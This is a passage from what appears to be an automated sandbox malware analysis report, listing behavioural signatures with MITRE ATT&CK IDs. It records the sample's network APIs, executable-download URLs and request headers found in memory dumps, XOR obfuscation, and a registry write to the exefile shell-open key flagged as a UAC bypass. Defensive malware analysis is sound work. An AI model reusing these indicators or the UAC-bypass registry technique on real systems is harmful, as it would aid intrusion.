\"www.teacup.com\"\n Pattern match: \"www.zillow.com\"\n Heuristic match: \"linternaute.com\"\n Heuristic match: \"usmagazine.com\"\n Pattern match: \"www.gosunpro.com\"\n Pattern match: \"www.xfinity.com\"\n Heuristic match: \"serving-sys.com\"\n Heuristic match: \"rakuten.co.jp\"\n Heuristic match: \"gamesgames.com\"\n Heuristic match: \"skysports.com\"\n Heuristic match: \"autotrader.co.uk\"\n Heuristic match: \"contextweb.com\"\n Heuristic match: \"armorgames.com\"\n Heuristic match: \"dragonfable.com\"\n Pattern match: \"www.jalan.net\"\n Heuristic match: \"tap-secure.rubiconproject.com\"\n Heuristic match: \"rlcdn.com\"\n Heuristic match: \"blogcu.com\"\n Pattern match: \"www.free.fr\"\n Heuristic match: \"ligadx.com\"\n Heuristic match: \"sahcdn.com\"\n Heuristic match: \"moc.udiab.mh\"\n Heuristic match: \"hm.baidu.com\"\n Heuristic match: \"api.bing.com\"\n Pattern match: \"www.pnc.com\"\n Heuristic match: \"pixnet.cc\"\n Heuristic match: \"360doc.com\"\n Heuristic match: \"liadm.com\"\n Heuristic match: \"python.org\"\n Heuristic match: \"docin.com\"\n Heuristic match: \"moc.hctam.se\"\n Heuristic match: \"es.match.com\"\n Heuristic match: \"zemanta.com\"\n Heuristic match: \"oricon.co.jp\"\n Heuristic match: \"pj.abema.nl\"\n Heuristic match: \"ln.ameba.jp\"\n Heuristic match: \"lashou.com\"\n Heuristic match: \"cookpad.com\"\n Heuristic match: \"hao123.com\"\n Heuristic match: \"blizzard.com\"\n Heuristic match: \"rambler.ru\"\n Heuristic match: \"badoo.com\"\n Heuristic match: \"amazon.com\"\n Heuristic match: \"m0mentum.net\"\n Pattern match: \"www.ikea.com\"\n Heuristic match: \"atdmt.com\"\n Heuristic match: \"adswizz.com\"\n Heuristic match: \"libero.it\"\n Pattern match: \"www.webs.com\"\n Heuristic match: \"360daily.com\"\n Heuristic match: \"adrta.com\"\n Heuristic match: \"compado.es\"\n Heuristic match: \"mapquest.com\"\n Pattern match: \"www.3366.com\"\n Heuristic match: \"twitter.com\"\n Heuristic match: \"tagged.com\"\n Heuristic match: \"fidelity.com\"\n Heuristic match: \"youtube.com\"\n Heuristic match: \"foxtab.com\"\n Heuristic match: \"wretch.cc\"\n Heuristic match: \"60photos.com\"\n Heuristic match: \"aweber.com\"\n Heuristic match: \"weather.com\"\n Heuristic match: \"bigpoint.com\"\n Heuristic match: \"taobao.com\"\n Heuristic match: \"ebay.com.au\"\n Heuristic match: \"musica.com\"\n Heuristic match: \"wushen.com\"\n Heuristic match: \"exelator.com\"\n Heuristic match: \"navdmp.com\"\n Heuristic match: \"popads.net\"\n Heuristic match: \"douban.com\"\n Heuristic match: \"ih.adscale.de\"\n Pattern match: \"www.rakuten.co.jp\"\n Heuristic match: \"gateway.foresee.com\"\n Heuristic match: \"same.eastmoney.com\"\n Pattern match: \"www.priceline.com\"\n Pattern match: \"www.monografias.com\"\n Heuristic match: \"legolas-media.com\"\n Heuristic match: \"smartadserver.com\"\n Heuristic match: \"jxedt.com\"\n Heuristic match: \"adscale.de\"\n Pattern match: \"www.pof.es\"\n Heuristic match: \"buzzle.com\"\n Pattern match: \"www.ning.com\"\n Pattern match: \"www.kp.ru\"\n Heuristic match: \"kohls.com\"\n Heuristic match: \"impact-ad.jp\"\n Heuristic match: \"corriere.it\"\n Heuristic match: \"mynet.com\"\n Heuristic match: \"bla01.com\"\n Heuristic match: \"gnavi.co.jp\"\n Heuristic match: \"metacafe.com\"\n Heuristic match: \"adyun.com\"\n Pattern match: \"www.sapo.pt\"\n Heuristic match: \"stat.eol.cn\"\n Heuristic match: \"digitru.st\"\n Pattern match: \"www.eol.cn\"\n Heuristic match: \"afy11.net\"\n Heuristic match: \"i.liadm.com\"\n Heuristic match: \"angsrvr.com\"\n Heuristic match: \"adform.net\"\n Heuristic match: \"moevideo.net\"\n Pattern match: \"www.bing.com\"\n Heuristic match: \"nexage.com\"\n Heuristic match: \"districtm.io\"\n Heuristic match: \"tapad.com\"\n Heuristic match: \"gismeteo.ru\"\n Heuristic match: \"linkedin.com\"\n Heuristic match: \"deloton.com\"\n Heuristic match: \"c.msn.com\"\n Heuristic match: \"goo.ne.jp\"\n Heuristic match: \"readme.ru\"\n Heuristic match: \"bat.bing.com\"\n Heuristic match: \"rutube.ru\"\n Pattern match: \"www.qvc.com\"\n Heuristic match: \"wayfair.com\"\n Heuristic match: \"bttrack.com\"\n Heuristic match: \"ournba.net\"\n Heuristic match: \"toshiba.com\"\n Heuristic match: \"beemp3s.org\"\n Heuristic match: \"qtmojo.com\"\n Heuristic match: \"piriform.com\"\n Heuristic match: \"adtech.de\"\n Heuristic match: \"ixiaa.com\"\n Pattern match: \"www.gmx.net\"\n Heuristic match: \"jalan.net\"\n Heuristic match: \"nextag.com\"\n Pattern match: \"www.kohls.com\"\n Heuristic match: \"homedepot.com\"\n Heuristic match: \"crwdcntrl.net\"\n Pattern match: \"www.mynet.com\"\n Heuristic match: \"justanswer.com\"\n Heuristic match: \"pcauto.com.cn\"\n Heuristic match: \"mediafire.com\"\n Heuristic match: \"netshoes.com.br\"\n Heuristic match: \"cheapoair.com\"\n Heuristic match: \"matome.naver.jp\"\n Heuristic match: \"advertising.com\"\n Pattern match: \"www.match.com\"\n Heuristic match: \"sync.shinobi.jp\"\n Heuristic match: \"commander1.com\"\n Heuristic match: \"j.mrpdata.net\"\n Heuristic match: \"accengage.net\"\n Heuristic match: \"brothersoft.com\"\n Heuristic match: \"allabout.co.jp\"\n Heuristic match: \"bidswitch.net\"\n Pattern match: \"www.meetic.es\"\n Heuristic match: \"enfemenino.com\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-419", "type": 2, "relevance": 1, "name": "Contains ability to open a port and listen for incoming connection (API string)", "description": "Found reference to API \"setsockopt\" (Indicator: \"setsockopt\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")", "origin": "File/Memory", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://www.3721.com/adjusttime.htmmozilla/4.0\" - Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found URL \"http://%s/https://http://abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/=quitdele\" - Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found URL \"http://www.mxm9191.com/myrunner_up.exehttp://www.zigui.org/article.php?id=103822.exe.exe.exe.exeqqtalk.execctv.exeflash.exeflash.exe.exeflash.exe.exe.exe.exe.exe.exemerrychristmasinternatinternat.exemspbint.exemspsint.exemssysint.exeiexplore\" - Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found URL \"http://www.zigui.org/article.php?id=103822hon36uine\\;c:\\prozpsmodulepath=c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\;c:\\program\" - Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n \"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"WSASend\" (Indicator: \"WSASend\"; Source: \"00000000-00005856-00000C29-54755884\")\n Found reference to API \"WSARecv\" (Indicator: \"WSARecv\"; Source: \"00000000-00005856-00000C29-54756173\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"URLDownloadToCacheFileA\" (Indicator: \"URLDownload\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"URLDownloadToCacheFileA\" (Indicator: \"URLDownload\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found string \"GET /article.php?id=103822 HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp\")\n Found string \"T /article.php?id=103822 HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"icle.php?id=103822 HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"HTTP/1.1 400 Bad Request\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"rundll32.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-169", "type": 2, "relevance": 1, "name": "Found mail related domain names", "description": "Observed email domain:\"pop3.163.com\" [Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c]\n Observed email domain:\"pop3.163.com\" [Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp]\n Observed email domain:\"ten.sdapop.evres\" [Source: 00000000-00005856.00000001.66223.002F0000.00000004.mdmp]\n Observed email domain:\"www.gmx.net\" [Source: 00000000-00005856.00000001.66223.002F0000.00000004.mdmp]", "origin": "File/Memory", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-143", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a new HTTP request", "description": "\"rundll32.exe\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /article.php?id=103822\" - (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /article.php?id=103822\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"rundll32.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (UID: 00000000-00005856)\n \"rundll32.exe\" called \"InternetOpenW with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"/article\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Encoding\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"gzip\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"MSIE\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"NET4\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"InfoPath\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Host\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "stream-139", "type": 1, "name": "Contains XOR operation loops [Stream disassembly]", "description": "Assembly shows XOR instruction xor byte ptr [3F9073B7h]\n ch in Stream UID: 61726-89-0040A570", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: HTTP requests contain Base64 strings\n Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: HTTP requests contain Base64 strings\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: Contains ability to create a new HTTP request (API string)\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Found potential IP address in binary/memory\n Matched sigs: Contains ability to communicate with network (API string)\n Matched sigs: Contains ability to create a HTTP or FTP session (API string)\n Matched sigs: Calls an API typically used to create a HTTP or FTP session\n Matched sigs: Calls an API typically used to create a new HTTP request\n Matched sigs: Contacts server\n Matched sigs: Contacts domains\n Matched sigs: Spawned process connects to a network", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp\")\n Found string \"\\Device\\{90A066FE-591C-47F3-850D-9644B684FBA5}\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-342", "type": 2, "relevance": 1, "name": "Contains reference to Hijacked CLSID(s)", "description": "Observed string: \"CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\" (Indicator: \"{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\") in Source: 00000000-00005856.00000001.66223.002F0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-159", "type": 3, "relevance": 1, "name": "Modifies windows command shell related registry path (UAC Bypass)", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%1\" %*\"), \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"A200AB0020002200250031002200200025002A000000\"), \"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"A200AB0020002200250031002200200025002A000000\")", "origin": "Registry Access", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: 